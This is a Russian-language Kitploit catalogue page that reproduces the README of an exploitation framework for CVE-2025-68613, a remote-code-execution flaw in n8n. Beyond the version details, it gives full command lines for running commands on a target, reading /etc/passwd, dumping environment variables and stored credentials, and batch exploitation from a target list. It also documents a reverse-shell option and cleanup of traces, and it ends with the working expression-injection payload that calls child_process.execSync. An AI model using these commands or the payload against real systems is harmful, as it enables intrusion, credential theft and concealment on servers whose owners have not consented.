Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Удаленное выполнение кода автоматизации рабочих процессов | Kitploit
Инструменты/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed Teaming
Инструмент Удаленного Доступа
Разработка Полезной Нагрузки
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Удаленное выполнение кода автоматизации рабочих процессов

Репозиторий
53149 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

n8n God Mode Ultimate — CVE-2025-68613 Сканер и фреймворк для эксплуатации

n8n God Mode Ultimate

Продвинутый инструмент для сканирования и эксплуатации RCE в n8n Workflow Automation

Python Version License CVE CVSS Score


🎯 Обзор

n8n God Mode Ultimate — это комплексный фреймворк для тестирования безопасности, предназначенный для обнаружения и проверки CVE-2025-68613 в платформах автоматизации рабочих процессов n8n. Эта критическая уязвимость удаленного выполнения кода (RCE) затрагивает версии n8n через внедрение выражений в контекстах выполнения рабочих процессов.

Детали CVE-2025-68613

  • Оценка CVSS: 10.0 (Критическая)
  • Вектор атаки: Сеть
  • Сложность атаки: Низкая
  • Необходимые привилегии: Низкие (действительные учетные данные)
  • Взаимодействие с пользователем: Не требуется
  • Тип уязвимости: Внедрение выражений → Удаленное выполнение кода

Затронутые версии:

  • n8n >= 0.211.0 и < 1.120.4
  • n8n >= 1.121.0 и < 1.121.1

Исправленные версии:

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ Возможности

🔍 Обнаружение и сканирование

  • Интеллектуальное определение версии — Извлечение версии n8n из метаданных страницы входа
  • Пакетное сканирование — Многопоточное одновременное сканирование целей с отслеживанием прогресса
  • Несколько режимов сканирования:
    • --detect — Только определение версии (самый быстрый, неинтрузивный)
    • --safe — Безопасная проверка уязвимости без эксплуатации
    • --poc — Проверка концепции RCE
    • --exploit — Полный режим эксплуатации

💣 Возможности эксплуатации

  • 4 метода эксплуатации:
    1. Schedule Trigger — Автоматически выполняемый рабочий процесс (наиболее надежный)
    2. Webhook Trigger — Выполнение по HTTP-триггеру
    3. Code Node — Прямой доступ к child_process
    4. Expression Injection — Ручное выполнение выражений

🎮 Режим «God Mode»

  • Интерактивная оболочка — Полная удаленная оболочка с историей команд
  • Операции с файлами:
    • read <файл> — Чтение удаленных файлов
    • write <файл> <содержимое> — Запись файлов на цель
  • Извлечение окружения — Дамп всех переменных окружения
  • Информация о системе — Детали ОС, конфигурация сети, информация о процессах
  • Обратная оболочка — Опциональная генерация полезной нагрузки reverse shell
  • История команд — Встроенное отслеживание истории

📊 Расширенные возможности

  • Перебор учетных данных — Извлечение сохраненных учетных данных через API
  • Дамп рабочих процессов — Экспорт всех рабочих процессов с метаданными
  • Извлечение конфигурации — Полный дамп системной конфигурации
  • Перебор пользователей — Список всех пользователей n8n
  • Анализ журналов выполнения — Разбор вывода команд из выполнений рабочих процессов
  • Автоматическая очистка — Опциональное удаление рабочих процессов после выполнения

🚀 Установка

Предварительные требования

# Python 3.8 или выше
python3 --version

# Менеджер пакетов pip
pip3 --version

Установка зависимостей

# Клонирование репозитория
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Установка необходимых пакетов
pip3 install -r requirements.txt

Зависимости

requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 Использование

Базовое использование

# Показать меню справки
python3 n8n-godmode-ultimate.py -h

# Определить версию n8n (неинтрузивно)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect

# Безопасная проверка уязвимости
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password

# Проверка концепции RCE
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password

# Полная эксплуатация
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password

Операции в режиме God Mode

# Выполнить одну команду
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --cmd "whoami"

# Прочитать удаленный файл
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --read-file "/etc/passwd"

# Записать удаленный файл
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"

# Извлечь переменные окружения
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --dump-env

# Интерактивная оболочка
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
  -e [email protected] -p password --shell

Пакетное сканирование

# Сканирование нескольких целей из файла
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20

# Пакетная эксплуатация
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10

Формат targets.txt:

http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org

Команды интерактивной оболочки

В режиме оболочки (--shell):

n8n> whoami              # Выполнить команду
n8n> read /etc/passwd    # Прочитать файл
n8n> env                 # Показать переменные окружения
n8n> info                # Информация о системе
n8n> history             # История команд
n8n> exit                # Выйти из оболочки

🛠️ Параметры командной строки

Параметры цели

-u, --url URL             URL целевого n8n
-l, --list FILE           Файл со списком URL целей
-t, --threads NUM         Количество потоков для пакетного сканирования (по умолчанию: 10)

Аутентификация

-e, --email EMAIL         Email пользователя n8n
-p, --password PASS       Пароль пользователя n8n

Режимы сканирования

--detect                  Только определение версии (самый быстрый)
--safe                    Безопасная проверка без эксплуатации
--poc                     Проверка концепции RCE
--exploit                 Полный режим эксплуатации

God Mode

--god                     Включить god mode
--cmd COMMAND             Выполнить одну команду
--read-file PATH          Прочитать удаленный файл
--write-file PATH         Записать удаленный файл
--content DATA            Содержимое для операции записи
--dump-env                Извлечь все переменные окружения
--shell                   Режим интерактивной оболочки
--revshell HOST:PORT      Полезная нагрузка обратной оболочки

Параметры эксплуатации

--mode MODE               Режим эксплуатации: schedule|webhook|code|expression (по умолчанию: schedule)
--timeout SEC             Тайм-аут команды в секундах (по умолчанию: 30)
--cleanup                 Удалить рабочие процессы после выполнения
-k, --insecure           Отключить проверку SSL
-v, --verbose            Подробный вывод
-q, --quiet              Минимальный вывод

🔬 Технические детали

Методология эксплуатации

1. Schedule Trigger (Рекомендуется)

Создает рабочий процесс с запланированным триггером, который автоматически выполняется каждые 3 секунды. Самый надежный метод.

Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}
Скачать инструмент